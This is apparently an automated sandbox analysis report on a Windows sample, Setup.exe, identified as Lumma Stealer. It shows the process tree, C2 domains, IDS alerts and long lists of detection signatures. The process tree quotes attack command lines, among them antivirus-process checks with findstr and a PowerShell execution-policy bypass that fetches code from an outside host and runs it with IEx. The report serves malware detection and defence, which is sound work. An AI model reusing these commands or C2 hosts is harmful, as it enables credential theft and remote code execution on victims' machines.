Windows
Analysis Report
Setup.exe
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- Setup.exe (PID: 7512 cmdline:
"C:\Users\ user\Deskt op\Setup.e xe" MD5: 6D9439C5AFD2CB8DEEB2BD71A93E7828) - cmd.exe (PID: 7564 cmdline:
"C:\Window s\System32 \cmd.exe" /c move Co mbinations Combinati ons.cmd & Combinatio ns.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7572 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tasklist.exe (PID: 7628 cmdline:
tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1) - findstr.exe (PID: 7636 cmdline:
findstr /I "opssvc w rsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E) - tasklist.exe (PID: 7676 cmdline:
tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1) - findstr.exe (PID: 7684 cmdline:
findstr "A vastUI AVG UI bdservi cehost nsW scSvc ekrn SophosHea lth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E) - cmd.exe (PID: 7724 cmdline:
cmd /c md 250661 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - extrac32.exe (PID: 7740 cmdline:
extrac32 / Y /E Keywo rds MD5: 9472AAB6390E4F1431BAA912FCFF9707) - findstr.exe (PID: 7764 cmdline:
findstr /V "Ml" Empi rical MD5: F1D4BE0E99EC734376FDE474A8D4EA3E) - cmd.exe (PID: 7780 cmdline:
cmd /c cop y /b 25066 1\Creates. com + Offi cer + Rand y + Task + Acm + Hdt v + Buying + Carried + Horn + Powered 25 0661\Creat es.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - cmd.exe (PID: 7796 cmdline:
cmd /c cop y /b ..\St andings + ..\Extreme ly + ..\In sert + ..\ Kevin + .. \Animated + ..\Colle ctibles U MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - Creates.com (PID: 7812 cmdline:
Creates.co m U MD5: 62D09F076E6E0240548C2F837536A46A) - powershell.exe (PID: 5796 cmdline:
powershell -exec byp ass [Net.s ervicepOIN TmANaGer]: :SEcURiTyP rOtoCOl = [Net.SecUr iTyprOtoco ltYPe]::tL s12; $gD=' https://df gh.online/ invoker.ph p?compName ='+$env:co mputername ; $pTSr = iWr -uRi $ gD -uSebAS IcpARsiNg -UsErAGent 'Mozilla/ 5.0 (Windo ws NT 10.0 ; Win64; x 64) AppleW ebKit/57.3 6 (KHTML, like Gecko ) Chrome/1 2.0.0.0 Sa fari/57.36 '; IEx $Pt sr.Content ; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 1436 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - choice.exe (PID: 7828 cmdline:
choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Lumma Stealer, LummaC2 Stealer | Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. | No Attribution |
{"C2 url": ["littlenotii.biz", "fraggielek.biz", "grandiouseziu.biz", "marketlumpe.biz", "nuttyshopr.biz", "spookycappy.biz", "rhetoricakue.cyou", "truculengisau.biz", "punishzement.biz"], "Build id": "hRjzG3--TRON"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security | ||
JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security | ||
JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): |
Source: | Author: frack113: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-10T23:25:52.975929+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49737 | 172.67.223.109 | 443 | TCP |
2025-01-10T23:25:53.939706+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49738 | 172.67.223.109 | 443 | TCP |
2025-01-10T23:25:55.487739+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49739 | 172.67.223.109 | 443 | TCP |
2025-01-10T23:25:56.668287+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49740 | 172.67.223.109 | 443 | TCP |
2025-01-10T23:25:58.561139+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49741 | 172.67.223.109 | 443 | TCP |
2025-01-10T23:25:59.959189+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49742 | 172.67.223.109 | 443 | TCP |
2025-01-10T23:26:00.937079+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49743 | 172.67.223.109 | 443 | TCP |
2025-01-10T23:26:03.143433+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49744 | 172.67.223.109 | 443 | TCP |
2025-01-10T23:26:05.129327+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49745 | 172.67.223.109 | 443 | TCP |
2025-01-10T23:26:13.579047+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49782 | 185.161.251.21 | 443 | TCP |
2025-01-10T23:26:14.382673+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49791 | 172.67.162.153 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-10T23:25:53.459399+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49737 | 172.67.223.109 | 443 | TCP |
2025-01-10T23:25:54.438326+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49738 | 172.67.223.109 | 443 | TCP |
2025-01-10T23:26:12.724779+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49745 | 172.67.223.109 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-10T23:25:53.459399+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49737 | 172.67.223.109 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-10T23:25:54.438326+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.4 | 49738 | 172.67.223.109 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-10T23:26:00.431403+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 172.67.223.109 | 443 | TCP |
Click to jump to signature section
AV Detection |
---|
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: |
Source: | Malware Configuration Extractor: |
Source: | Virustotal: | Perma Link | ||
Source: | ReversingLabs: |
Source: | Integrated Neural Analysis Model: |
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: |
Source: | Static PE information: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 0_2_004062D5 | |
Source: | Code function: | 0_2_00402E18 | |
Source: | Code function: | 0_2_00406C9B |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Networking |
---|
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: |
Source: | File created: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | JA3 fingerprint: |
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Code function: | 0_2_004050CD |
Source: | Code function: | 0_2_004044A5 |
Source: | Code function: | 0_2_00403883 |
Source: | File created: | Jump to behavior | ||
Source: | File created: | Jump to behavior | ||
Source: | File created: | Jump to behavior | ||
Source: | File created: | Jump to behavior |
Source: | Code function: | 0_2_0040497C | |
Source: | Code function: | 0_2_00406ED2 | |
Source: | Code function: | 0_2_004074BB |
Source: | Dropped File: |
Source: | Code function: |
Source: | Static PE information: |
Source: | Static PE information: |
Source: | Classification label: |
Source: | Code function: | 0_2_004044A5 |
Source: | Code function: | 0_2_004024FB |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | Static PE information: |
Source: | WMI Queries: | ||
Source: | WMI Queries: |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Binary or memory string: |
Source: | Virustotal: | ||
Source: | ReversingLabs: |
Source: | File read: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Process created: |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Source: | Static file information: |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Data Obfuscation |
---|
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Code function: | 0_2_004062FC |
Source: | Code function: | 17_2_048B3ADA |
Persistence and Installation Behavior |
---|
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | WMI Queries: |
